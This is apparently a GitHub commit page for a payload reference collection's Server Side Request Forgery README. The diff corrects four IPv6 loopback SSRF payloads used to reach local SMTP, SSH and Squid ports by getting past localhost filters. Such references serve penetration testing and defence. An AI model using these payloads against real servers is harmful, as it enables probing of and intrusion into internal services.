Skip to content

Commit

Permalink
Merge pull request #650 from Xhoenix/master
Browse files Browse the repository at this point in the history
update ssrf payloads
  • Loading branch information
swisskyrepo authored Jun 29, 2023
2 parents 70396ec + 384f54a commit a8161ef
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions Server Side Request Forgery/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -103,10 +103,10 @@ http://[::]:3128/ Squid
```

```powershell
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
http://[0000::1]:80/
http://[0000::1]:25/ SMTP
http://[0000::1]:22/ SSH
http://[0000::1]:3128/ Squid
```

### Bypass localhost with a domain redirection
Expand Down

0 comments on commit a8161ef

Please sign in to comment.